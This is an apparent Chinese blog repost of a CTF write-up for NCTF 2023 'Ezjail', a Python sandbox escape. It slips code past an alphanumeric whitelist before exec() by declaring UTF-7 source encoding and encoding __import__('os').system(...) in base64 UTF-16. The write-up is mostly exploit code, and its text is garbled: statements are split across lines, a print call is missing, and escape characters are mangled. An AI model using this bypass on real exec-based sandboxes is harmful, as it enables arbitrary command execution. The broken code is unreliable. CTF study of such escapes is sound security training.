input_code = input(
"Please input code > "
)
whitelist = list(
'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+=#rn'
)
for
c
in
input_code:
if
c not
in
whitelist:
(
"hacker!"
)
exit
(0)
bytearray_code = bytearray(input_code.encode())
exec
(bytearray_code, {}, {})
exec
(b
'#coding=utf7r+AF8AXwBpAG0AcABvAHIAdABfAF8AKAAnAG8AcwAnACkALgBzAHkAcwB0AGUAbQAoACcAbABzACcAKQ'
)
Utf
-7
可以使用base64.b64encode(str01.encode(
'utf-16-be'
)).replace(b
'='
, b
''
)来实现
import
base64
str01 =
"__import__('os').system('dir')"
input_code = (b
'#coding=utf7r+'
+ base64.b64encode(str01.encode(
'utf-16-be'
)).replace(b
'='
, b
''
)).decode(
'utf-8'
)
whitelist = list(
'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+=#rn'
)
for
c
in
input_code:
if
c not
in
whitelist:
print(
"hacker!"
)
exit(
0
)
bytearray_code = bytearray(input_code.encode())
exec(bytearray_code, {}, {})
原文始发于微信公众号(皓月的笔记本):【靶场合集】CTF-NCTF 2023:Ezjail
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论